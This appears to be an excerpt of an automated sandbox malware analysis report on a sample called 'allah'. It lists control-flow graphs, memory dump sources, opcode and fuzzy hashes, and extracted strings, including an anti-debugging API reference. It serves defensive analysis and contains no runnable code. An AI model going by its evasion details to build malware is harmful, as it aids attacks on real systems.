                                                                        control_flow_graph 1476 7ffbac111268-7ffbac11126a 1477 7ffbac1112cb-7ffbac111310 1476->1477 1478 7ffbac11126c-7ffbac1112a5 1476->1478 1484 7ffbac111312-7ffbac111325 1477->1484 1485 7ffbac111327-7ffbac11135f 1477->1485 1484->1485 1491 7ffbac1113a1-7ffbac1113d0 1485->1491 1492 7ffbac111361-7ffbac111375 1485->1492 1494 7ffbac1113d2-7ffbac1113e5 1491->1494 1495 7ffbac1113e7-7ffbac1113e8 1491->1495 1494->1495 1497 7ffbac1113ef-7ffbac1113f6 1495->1497 1498 7ffbac1113fd-7ffbac11141f 1497->1498 1500 7ffbac111461-7ffbac111490 1498->1500 1501 7ffbac111421-7ffbac111435 1498->1501 1504 7ffbac111492-7ffbac1114a5 1500->1504 1505 7ffbac1114a7-7ffbac1114df 1500->1505 1504->1505 1510 7ffbac111521-7ffbac1115b6 1505->1510 1511 7ffbac1114e1-7ffbac1114f5 1505->1511 1517 7ffbac1115b8-7ffbac1115be 1510->1517 1518 7ffbac1115ca-7ffbac1115ce 1510->1518 1511->1510 1519 7ffbac1115d1-7ffbac1115d7 1517->1519 1522 7ffbac1115c0-7ffbac1115d7 1517->1522 1518->1519 1521 7ffbac1115dd-7ffbac1115f9 1519->1521 1527 7ffbac1115fb-7ffbac111616 1521->1527 1528 7ffbac111627-7ffbac11162e 1521->1528 1522->1521 1529 7ffbac111630-7ffbac111636 1528->1529 1530 7ffbac111633-7ffbac111636 1528->1530 1533 7ffbac11163d-7ffbac111828 1529->1533 1530->1533 1540 7ffbac111838-7ffbac111898 1533->1540 1541 7ffbac11182a-7ffbac111836 1533->1541 1544 7ffbac1118b6-7ffbac111961 1540->1544 1545 7ffbac11189a-7ffbac1118a1 1540->1545 1541->1540
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.685907097.00007FFBAC110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC110000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac110000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ,__^
                                                                        • API String ID: 0-498113407
                                                                        • Opcode ID: 49f0baa9b70d3b04dfedee85d65ebfee262a2952dde9b3ed1ae6f01022a514a3
                                                                        • Instruction ID: df3e1050fd0402db2edfe53198ebca064d856bb738e41c43e9c2508f8fa771ee
                                                                        • Opcode Fuzzy Hash: 49f0baa9b70d3b04dfedee85d65ebfee262a2952dde9b3ed1ae6f01022a514a3
                                                                        • Instruction Fuzzy Hash: CCF10892B1E7DA4FD703A73CA8691E47FA0DF9622171900FBC589CB1A3DD18984BC361
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC11AA8A Relevance: 1.6, APIs: 1, Instructions: 145COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.685907097.00007FFBAC110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC110000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac110000_allah.jbxd
                                                                        Similarity
                                                                        • API ID: CheckDebuggerPresentRemote
                                                                        • String ID:
                                                                        • API String ID: 3662101638-0
                                                                        • Opcode ID: dffad97dc0547869fb4cacb73cbda5020fd8050f4b8bb7332205f41d1c36260e
                                                                        • Instruction ID: 72d258a0b0cb1ef2c0c527507903a30b0a12351dda8f7084bad07982068b10af
                                                                        • Opcode Fuzzy Hash: dffad97dc0547869fb4cacb73cbda5020fd8050f4b8bb7332205f41d1c36260e
                                                                        • Instruction Fuzzy Hash: 0641097180C7988FDB2ADB6898456E97FF0EF56321F04026FD08AD3293DE78644AC751
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC11B9D6 Relevance: 1.5, Strings: 1, Instructions: 260COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.685907097.00007FFBAC110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC110000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac110000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: j^_H
                                                                        • API String ID: 0-1457079288
                                                                        • Opcode ID: e08bd766eba8c8a6c861082e1ddc67dbddb23dfb516c631249e87dfd8262ff4f
                                                                        • Instruction ID: 5889ebd1dab3be123a9e9b6d884014bd17b674f0f9964e3cc98bad152ae94675
                                                                        • Opcode Fuzzy Hash: e08bd766eba8c8a6c861082e1ddc67dbddb23dfb516c631249e87dfd8262ff4f
                                                                        • Instruction Fuzzy Hash: 9D815F9551F7C52FD343B3B849AAAE6BFE0AE4B21074C49EED4CA8B1A3C90C6517D341
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC5AEBED Relevance: 1.0, Instructions: 987COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f6436a666cfe1187564b78d053b4c100ddd4e9e4d9efb6691d991e265b4f4b15
                                                                        • Instruction ID: 76825579df478adf52a161d339ea6883bc7b25ea9a8c825128e94ef04e5b815a
                                                                        • Opcode Fuzzy Hash: f6436a666cfe1187564b78d053b4c100ddd4e9e4d9efb6691d991e265b4f4b15
                                                                        • Instruction Fuzzy Hash: 31626270609A498FEB95EB2CC459B797BE1FF99301F1445BAE48DC72A2DE34E842C701
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC119076 Relevance: .5, Instructions: 471COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.685907097.00007FFBAC110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC110000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac110000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f1ece61dd9ff578e632fbe7a7e0949fb04437d36a9f0f2eedf9b4f871d6e58be
                                                                        • Instruction ID: 55bb91585e9c7d261c5ba661f88ebfd068600047f73d74661bfc2aa1aa1fb436
                                                                        • Opcode Fuzzy Hash: f1ece61dd9ff578e632fbe7a7e0949fb04437d36a9f0f2eedf9b4f871d6e58be
                                                                        • Instruction Fuzzy Hash: 05F1C770A18A8D8FEBA9DF28C8497E937D1FF54310F04426ED85DC7291DB38E9458B81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC119E22 Relevance: .5, Instructions: 456COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.685907097.00007FFBAC110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC110000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac110000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1c193170595b56b585c3ca31a47ba355342066d40266fea2d3a81ba8169b5ddb
                                                                        • Instruction ID: fa99d434ff443bf6240775224dee73daf2a4206a0ecd518b364bd37aa2097508
                                                                        • Opcode Fuzzy Hash: 1c193170595b56b585c3ca31a47ba355342066d40266fea2d3a81ba8169b5ddb
                                                                        • Instruction Fuzzy Hash: 20E1D570A08A4E8FEBAADF28C8597E93BD1FF55310F14426EE84DC7291DE78D8458781
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC5AA335 Relevance: .4, Instructions: 370COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 449c722f3e2de9011d554c52817ec182aa2dd76522784c0f8fc804d1b6f7f135
                                                                        • Instruction ID: bb1ff42a954a65a41326b653bb49ee1c5d5c864b7aaa264a1765c51571cc3b71
                                                                        • Opcode Fuzzy Hash: 449c722f3e2de9011d554c52817ec182aa2dd76522784c0f8fc804d1b6f7f135
                                                                        • Instruction Fuzzy Hash: 5AC141B1E18A198FDB58DA29C449779B3E1FF98301F1445BEE44EE3691CE35EC828B40
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC1E1139 Relevance: 8.4, Strings: 6, Instructions: 906COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 348 7ffbac1e1139-7ffbac1e1190 351 7ffbac1e11a3-7ffbac1e11c4 348->351 352 7ffbac1e1192-7ffbac1e11a2 348->352 354 7ffbac1e11ca-7ffbac1e11d4 351->354 355 7ffbac1e12dd-7ffbac1e138d 351->355 352->351 357 7ffbac1e11d6-7ffbac1e11e3 354->357 358 7ffbac1e11ed-7ffbac1e11f2 354->358 394 7ffbac1e1390-7ffbac1e13a1 355->394 395 7ffbac1e138f 355->395 357->358 367 7ffbac1e11e5-7ffbac1e11eb 357->367 359 7ffbac1e11f8-7ffbac1e11fb 358->359 360 7ffbac1e127e-7ffbac1e1288 358->360 363 7ffbac1e1212-7ffbac1e1216 359->363 364 7ffbac1e11fd-7ffbac1e1206 359->364 365 7ffbac1e1297-7ffbac1e12da 360->365 366 7ffbac1e128a-7ffbac1e1296 360->366 363->360 374 7ffbac1e1218-7ffbac1e121e 363->374 364->363 365->355 367->358 377 7ffbac1e1220-7ffbac1e123b 374->377 378 7ffbac1e123d-7ffbac1e1247 374->378 377->378 383 7ffbac1e124e-7ffbac1e1257 378->383 386 7ffbac1e1259-7ffbac1e1266 383->386 387 7ffbac1e1270-7ffbac1e127d 383->387 386->387 390 7ffbac1e1268-7ffbac1e126e 386->390 390->387 396 7ffbac1e13a4-7ffbac1e143d 394->396 397 7ffbac1e13a3 394->397 395->394 399 7ffbac1e1443-7ffbac1e144d 396->399 400 7ffbac1e160c-7ffbac1e163a 396->400 397->396 401 7ffbac1e1469-7ffbac1e1476 399->401 402 7ffbac1e144f-7ffbac1e1467 399->402 408 7ffbac1e163c-7ffbac1e1689 400->408 409 7ffbac1e168e-7ffbac1e16bb 400->409 410 7ffbac1e15a5-7ffbac1e15af 401->410 411 7ffbac1e147c-7ffbac1e147f 401->411 402->401 408->409 430 7ffbac1e16c2-7ffbac1e16d3 409->430 431 7ffbac1e16bd 409->431 413 7ffbac1e15c0-7ffbac1e1609 410->413 414 7ffbac1e15b1-7ffbac1e15bf 410->414 411->410 415 7ffbac1e1485-7ffbac1e148d 411->415 413->400 415->400 418 7ffbac1e1493-7ffbac1e149d 415->418 421 7ffbac1e14b6-7ffbac1e14ba 418->421 422 7ffbac1e149f-7ffbac1e14b4 418->422 421->410 427 7ffbac1e14c0-7ffbac1e14c3 421->427 422->421 428 7ffbac1e14da-7ffbac1e14de 427->428 429 7ffbac1e14c5-7ffbac1e14ce 427->429 428->410 434 7ffbac1e14e4-7ffbac1e14e7 428->434 429->428 436 7ffbac1e16da-7ffbac1e1769 430->436 437 7ffbac1e16d5 430->437 431->430 435 7ffbac1e16bf 431->435 439 7ffbac1e14e9-7ffbac1e14f2 434->439 440 7ffbac1e14fe-7ffbac1e1502 434->440 435->430 454 7ffbac1e1da5-7ffbac1e1dfe 436->454 455 7ffbac1e176f-7ffbac1e1779 436->455 437->436 441 7ffbac1e16d7 437->441 439->440 440->410 445 7ffbac1e1508-7ffbac1e150e 440->445 441->436 447 7ffbac1e152a-7ffbac1e1547 445->447 448 7ffbac1e1510-7ffbac1e1523 445->448 447->410 453 7ffbac1e1549-7ffbac1e154f 447->453 448->447 458 7ffbac1e1551-7ffbac1e1564 453->458 459 7ffbac1e156e 453->459 456 7ffbac1e1792-7ffbac1e179a 455->456 457 7ffbac1e177b-7ffbac1e1790 455->457 456->454 461 7ffbac1e17a0-7ffbac1e17aa 456->461 457->456 470 7ffbac1e156b-7ffbac1e156c 458->470 466 7ffbac1e1573-7ffbac1e157c 459->466 464 7ffbac1e17c3-7ffbac1e17cb 461->464 465 7ffbac1e17ac-7ffbac1e17c1 461->465 464->454 471 7ffbac1e17d1-7ffbac1e17e5 464->471 465->464 472 7ffbac1e1595-7ffbac1e15a4 466->472 473 7ffbac1e157e-7ffbac1e158b 466->473 470->459 478 7ffbac1e17e8-7ffbac1e17fe 471->478 473->472 479 7ffbac1e158d-7ffbac1e1593 473->479 480 7ffbac1e1800-7ffbac1e1835 478->480 481 7ffbac1e183c-7ffbac1e1895 478->481 479->472 480->481 492 7ffbac1e1d75-7ffbac1e1d7a 481->492 493 7ffbac1e189b-7ffbac1e18a5 481->493 492->478 494 7ffbac1e18a7-7ffbac1e18b4 493->494 495 7ffbac1e18be-7ffbac1e18d4 493->495 494->495 499 7ffbac1e18b6-7ffbac1e18bc 494->499 499->495
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.686347845.00007FFBAC1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac1e0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: gy$gy$gy$gy$gy$gy
                                                                        • API String ID: 0-1645249843
                                                                        • Opcode ID: 4434dbbe4da9e57014643dbf5d7e08b6b140db44190cbc67cda5e5c19783c355
                                                                        • Instruction ID: 5551db038da31c9ad4457be4554bfe13a6b06b705598977684300271b2a2fcbd
                                                                        • Opcode Fuzzy Hash: 4434dbbe4da9e57014643dbf5d7e08b6b140db44190cbc67cda5e5c19783c355
                                                                        • Instruction Fuzzy Hash: B542D6A1A0EB8A4FEBA7D73888596B57BE1EF46310F1801BBD44EC7193DA18DC46C351
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC1E08E9 Relevance: 4.3, Strings: 3, Instructions: 510COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 568 7ffbac1e08e9-7ffbac1e095b 577 7ffbac1e0962-7ffbac1e0973 568->577 578 7ffbac1e095d 568->578 580 7ffbac1e097a-7ffbac1e0a0e 577->580 581 7ffbac1e0975 577->581 578->577 579 7ffbac1e095f 578->579 579->577 584 7ffbac1e0c24-7ffbac1e0c4b 580->584 585 7ffbac1e0a14-7ffbac1e0a1e 580->585 581->580 582 7ffbac1e0977 581->582 582->580 594 7ffbac1e0c68-7ffbac1e0cb7 584->594 595 7ffbac1e0c4d-7ffbac1e0c66 584->595 586 7ffbac1e0a37-7ffbac1e0a3c 585->586 587 7ffbac1e0a20-7ffbac1e0a2d 585->587 588 7ffbac1e0bc4-7ffbac1e0bce 586->588 589 7ffbac1e0a42-7ffbac1e0a47 586->589 587->586 596 7ffbac1e0a2f-7ffbac1e0a35 587->596 597 7ffbac1e0bd0-7ffbac1e0bdc 588->597 598 7ffbac1e0bdd-7ffbac1e0c21 588->598 592 7ffbac1e0a49-7ffbac1e0a60 589->592 593 7ffbac1e0a62 589->593 601 7ffbac1e0a64-7ffbac1e0a66 592->601 593->601 622 7ffbac1e0d0b-7ffbac1e0d0d 594->622 595->594 596->586 598->584 601->588 605 7ffbac1e0a6c-7ffbac1e0a6f 601->605 605->588 609 7ffbac1e0a75-7ffbac1e0a80 605->609 611 7ffbac1e0a90 609->611 612 7ffbac1e0a82-7ffbac1e0a8c 609->612 619 7ffbac1e0a95-7ffbac1e0aa2 611->619 615 7ffbac1e0aac-7ffbac1e0abc 612->615 616 7ffbac1e0a8e 612->616 620 7ffbac1e0ac9-7ffbac1e0adf 615->620 621 7ffbac1e0abe-7ffbac1e0ac7 615->621 616->619 619->615 627 7ffbac1e0aa4-7ffbac1e0aaa 619->627 620->611 632 7ffbac1e0ae1-7ffbac1e0aeb 620->632 621->620 624 7ffbac1e0cfa-7ffbac1e0cfe 622->624 625 7ffbac1e0d0f-7ffbac1e0d46 622->625 629 7ffbac1e0d48-7ffbac1e0d91 624->629 630 7ffbac1e0d00-7ffbac1e0d09 624->630 625->629 627->615 650 7ffbac1e0d94-7ffbac1e0d9d 629->650 651 7ffbac1e0d93 629->651 630->622 635 7ffbac1e0b04-7ffbac1e0b60 632->635 636 7ffbac1e0aed-7ffbac1e0b02 632->636 646 7ffbac1e0b80-7ffbac1e0b8d 635->646 647 7ffbac1e0b62-7ffbac1e0b7e 635->647 636->635 652 7ffbac1e0b94-7ffbac1e0b9d 646->652 647->646 654 7ffbac1e0da5 650->654 655 7ffbac1e0d9f 650->655 651->650 656 7ffbac1e0bb6-7ffbac1e0bc3 652->656 657 7ffbac1e0b9f-7ffbac1e0bac 652->657 658 7ffbac1e0da8-7ffbac1e0db1 654->658 659 7ffbac1e0da7 654->659 655->654 657->656 663 7ffbac1e0bae-7ffbac1e0bb4 657->663 661 7ffbac1e0db9 658->661 662 7ffbac1e0db3 658->662 659->658 664 7ffbac1e0dbc-7ffbac1e0dd1 661->664 665 7ffbac1e0dbb 661->665 662->661 663->656 665->664
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.686347845.00007FFBAC1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac1e0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: R_H$gy$gy
                                                                        • API String ID: 0-3948475402
                                                                        • Opcode ID: c79e4893155556e6d10886fb98a005cf994e9f7c0ab82209fd4495f18a802b39
                                                                        • Instruction ID: 95c740ffb95eb9917c9ce0604de113b55a0c26a42d18c0672a1192e6dc3d35c6
                                                                        • Opcode Fuzzy Hash: c79e4893155556e6d10886fb98a005cf994e9f7c0ab82209fd4495f18a802b39
                                                                        • Instruction Fuzzy Hash: 70F106A1A0EA9A4FEBA7E73888585B47BE1EF55314B0802FED44EC71D3DE18D806C355
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC1E0999 Relevance: 4.0, Strings: 3, Instructions: 246COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 796 7ffbac1e0999-7ffbac1e0a0e 798 7ffbac1e0c24-7ffbac1e0c4b 796->798 799 7ffbac1e0a14-7ffbac1e0a1e 796->799 808 7ffbac1e0c68-7ffbac1e0cb7 798->808 809 7ffbac1e0c4d-7ffbac1e0c66 798->809 800 7ffbac1e0a37-7ffbac1e0a3c 799->800 801 7ffbac1e0a20-7ffbac1e0a2d 799->801 802 7ffbac1e0bc4-7ffbac1e0bce 800->802 803 7ffbac1e0a42-7ffbac1e0a47 800->803 801->800 810 7ffbac1e0a2f-7ffbac1e0a35 801->810 811 7ffbac1e0bd0-7ffbac1e0bdc 802->811 812 7ffbac1e0bdd-7ffbac1e0c21 802->812 806 7ffbac1e0a49-7ffbac1e0a60 803->806 807 7ffbac1e0a62 803->807 815 7ffbac1e0a64-7ffbac1e0a66 806->815 807->815 836 7ffbac1e0d0b-7ffbac1e0d0d 808->836 809->808 810->800 812->798 815->802 819 7ffbac1e0a6c-7ffbac1e0a6f 815->819 819->802 823 7ffbac1e0a75-7ffbac1e0a80 819->823 825 7ffbac1e0a90 823->825 826 7ffbac1e0a82-7ffbac1e0a8c 823->826 833 7ffbac1e0a95-7ffbac1e0aa2 825->833 829 7ffbac1e0aac-7ffbac1e0abc 826->829 830 7ffbac1e0a8e 826->830 834 7ffbac1e0ac9-7ffbac1e0adf 829->834 835 7ffbac1e0abe-7ffbac1e0ac7 829->835 830->833 833->829 841 7ffbac1e0aa4-7ffbac1e0aaa 833->841 834->825 846 7ffbac1e0ae1-7ffbac1e0aeb 834->846 835->834 838 7ffbac1e0cfa-7ffbac1e0cfe 836->838 839 7ffbac1e0d0f-7ffbac1e0d46 836->839 843 7ffbac1e0d48-7ffbac1e0d91 838->843 844 7ffbac1e0d00-7ffbac1e0d09 838->844 839->843 841->829 864 7ffbac1e0d94-7ffbac1e0d9d 843->864 865 7ffbac1e0d93 843->865 844->836 849 7ffbac1e0b04-7ffbac1e0b60 846->849 850 7ffbac1e0aed-7ffbac1e0b02 846->850 860 7ffbac1e0b80-7ffbac1e0b8d 849->860 861 7ffbac1e0b62-7ffbac1e0b7e 849->861 850->849 866 7ffbac1e0b94-7ffbac1e0b9d 860->866 861->860 868 7ffbac1e0da5 864->868 869 7ffbac1e0d9f 864->869 865->864 870 7ffbac1e0bb6-7ffbac1e0bc3 866->870 871 7ffbac1e0b9f-7ffbac1e0bac 866->871 872 7ffbac1e0da8-7ffbac1e0db1 868->872 873 7ffbac1e0da7 868->873 869->868 871->870 877 7ffbac1e0bae-7ffbac1e0bb4 871->877 875 7ffbac1e0db9 872->875 876 7ffbac1e0db3 872->876 873->872 878 7ffbac1e0dbc-7ffbac1e0dd1 875->878 879 7ffbac1e0dbb 875->879 876->875 877->870 879->878
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.686347845.00007FFBAC1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac1e0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: R_H$gy$gy
                                                                        • API String ID: 0-3948475402
                                                                        • Opcode ID: 0a86dc281b5a511c5222f1813e1a1c7a51c0b899a753e3d6c8515cf34a718d00
                                                                        • Instruction ID: 177298766b07f7abc9046f745c8a845fa46aa482caff809e7957a55f0718a6c4
                                                                        • Opcode Fuzzy Hash: 0a86dc281b5a511c5222f1813e1a1c7a51c0b899a753e3d6c8515cf34a718d00
                                                                        • Instruction Fuzzy Hash: 4F7118B1A0EA5A4FEBA7DB3884582757BE1EF94314F1902BBC84DC7293CA28DC45C751
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC1E57BB Relevance: 3.2, Strings: 2, Instructions: 731COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1032 7ffbac1e57bb-7ffbac1e583d 1035 7ffbac1e5843-7ffbac1e584d 1032->1035 1036 7ffbac1e5a0c-7ffbac1e5abb 1032->1036 1037 7ffbac1e5869-7ffbac1e5876 1035->1037 1038 7ffbac1e584f-7ffbac1e5867 1035->1038 1079 7ffbac1e5ac2-7ffbac1e5ad3 1036->1079 1080 7ffbac1e5abd 1036->1080 1043 7ffbac1e59a5-7ffbac1e59af 1037->1043 1044 7ffbac1e587c-7ffbac1e587f 1037->1044 1038->1037 1049 7ffbac1e59c0-7ffbac1e5a09 1043->1049 1050 7ffbac1e59b1-7ffbac1e59bf 1043->1050 1044->1043 1048 7ffbac1e5885-7ffbac1e588d 1044->1048 1048->1036 1052 7ffbac1e5893-7ffbac1e589d 1048->1052 1049->1036 1055 7ffbac1e58b6-7ffbac1e58ba 1052->1055 1056 7ffbac1e589f-7ffbac1e58b4 1052->1056 1055->1043 1058 7ffbac1e58c0-7ffbac1e58c3 1055->1058 1056->1055 1061 7ffbac1e58ea 1058->1061 1062 7ffbac1e58c5-7ffbac1e58e8 1058->1062 1064 7ffbac1e58ec-7ffbac1e58ee 1061->1064 1062->1064 1064->1043 1067 7ffbac1e58f4-7ffbac1e58f7 1064->1067 1069 7ffbac1e58f9-7ffbac1e5902 1067->1069 1070 7ffbac1e590e-7ffbac1e5912 1067->1070 1069->1070 1070->1043 1074 7ffbac1e5918-7ffbac1e591e 1070->1074 1075 7ffbac1e593a-7ffbac1e5957 1074->1075 1076 7ffbac1e5920-7ffbac1e5933 1074->1076 1075->1043 1087 7ffbac1e5959-7ffbac1e597c 1075->1087 1076->1075 1083 7ffbac1e5ada-7ffbac1e5af0 1079->1083 1084 7ffbac1e5ad5 1079->1084 1080->1079 1082 7ffbac1e5abf 1080->1082 1082->1079 1085 7ffbac1e5af1-7ffbac1e5b3c 1083->1085 1086 7ffbac1e5b3d-7ffbac1e5b6a 1083->1086 1084->1083 1088 7ffbac1e5ad7 1084->1088 1085->1086 1093 7ffbac1e5b70-7ffbac1e5b7a 1086->1093 1094 7ffbac1e5cb2-7ffbac1e5d7b 1086->1094 1095 7ffbac1e5995-7ffbac1e59a4 1087->1095 1096 7ffbac1e597e-7ffbac1e598b 1087->1096 1088->1083 1097 7ffbac1e5b93-7ffbac1e5b98 1093->1097 1098 7ffbac1e5b7c-7ffbac1e5b91 1093->1098 1096->1095 1103 7ffbac1e598d-7ffbac1e5993 1096->1103 1101 7ffbac1e5c52-7ffbac1e5c5c 1097->1101 1102 7ffbac1e5b9e-7ffbac1e5ba1 1097->1102 1098->1097 1105 7ffbac1e5c5e-7ffbac1e5c6c 1101->1105 1106 7ffbac1e5c6d-7ffbac1e5caf 1101->1106 1107 7ffbac1e5ba3-7ffbac1e5bb2 1102->1107 1108 7ffbac1e5be6 1102->1108 1103->1095 1106->1094 1107->1094 1116 7ffbac1e5bb8-7ffbac1e5bc2 1107->1116 1111 7ffbac1e5be8-7ffbac1e5bea 1108->1111 1111->1101 1114 7ffbac1e5bec-7ffbac1e5bf2 1111->1114 1118 7ffbac1e5bf4-7ffbac1e5c0f 1114->1118 1119 7ffbac1e5c11-7ffbac1e5c15 1114->1119 1121 7ffbac1e5bc4-7ffbac1e5bd9 1116->1121 1122 7ffbac1e5bdb-7ffbac1e5be4 1116->1122 1118->1119 1127 7ffbac1e5c1b-7ffbac1e5c24 1119->1127 1121->1122 1122->1111 1130 7ffbac1e5c26-7ffbac1e5c33 1127->1130 1131 7ffbac1e5c3d-7ffbac1e5c51 1127->1131 1130->1131 1134 7ffbac1e5c35-7ffbac1e5c3b 1130->1134 1134->1131
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.686347845.00007FFBAC1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac1e0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: gy$gy
                                                                        • API String ID: 0-417113342
                                                                        • Opcode ID: cd723a0def1b66036e00b1a05bc891882c41bb72db398f9ed7a907a02c9a648f
                                                                        • Instruction ID: 18ba1302ba2770867150b8af8ae88d7b6c38397369debf972bcce86abbc60dfd
                                                                        • Opcode Fuzzy Hash: cd723a0def1b66036e00b1a05bc891882c41bb72db398f9ed7a907a02c9a648f
                                                                        • Instruction Fuzzy Hash: C72239B1A0EB9D4FEF97E62898595B53BE2EF86324B0801BBD44DC7193DA14EC06C351
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC5AE1A1 Relevance: 2.9, Strings: 2, Instructions: 407COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1138 7ffbac5ae1a1-7ffbac5ae233 1141 7ffbac5ae345-7ffbac5ae377 1138->1141 1142 7ffbac5ae239-7ffbac5ae23b 1138->1142 1152 7ffbac5ae37e-7ffbac5ae3b0 1141->1152 1143 7ffbac5ae255-7ffbac5ae263 1142->1143 1144 7ffbac5ae23d-7ffbac5ae24f 1142->1144 1146 7ffbac5ae269-7ffbac5ae280 1143->1146 1147 7ffbac5ae3b7-7ffbac5ae3e9 1143->1147 1144->1143 1144->1152 1159 7ffbac5ae29a-7ffbac5ae29d 1146->1159 1160 7ffbac5ae282-7ffbac5ae294 1146->1160 1161 7ffbac5ae3f0-7ffbac5ae431 1147->1161 1152->1147 1163 7ffbac5ae2c6-7ffbac5ae2e2 call 7ffbac5ab550 1159->1163 1164 7ffbac5ae29f-7ffbac5ae2b6 1159->1164 1160->1159 1160->1161 1180 7ffbac5ae433-7ffbac5ae439 1161->1180 1181 7ffbac5ae43d 1161->1181 1175 7ffbac5ae313-7ffbac5ae317 1163->1175 1176 7ffbac5ae2e4-7ffbac5ae312 1163->1176 1164->1163 1174 7ffbac5ae2b8-7ffbac5ae2bc 1164->1174 1179 7ffbac5ae2c3-7ffbac5ae2c4 1174->1179 1178 7ffbac5ae31e-7ffbac5ae344 1175->1178 1179->1163 1183 7ffbac5ae441-7ffbac5ae47c 1180->1183 1185 7ffbac5ae43b 1180->1185 1181->1183 1184 7ffbac5ae43f 1181->1184 1188 7ffbac5ae47e-7ffbac5ae4a5 1183->1188 1189 7ffbac5ae4bf-7ffbac5ae4f1 1183->1189 1184->1183 1185->1181 1195 7ffbac5ae4f8-7ffbac5ae51b 1188->1195 1198 7ffbac5ae4a7-7ffbac5ae4be 1188->1198 1189->1195
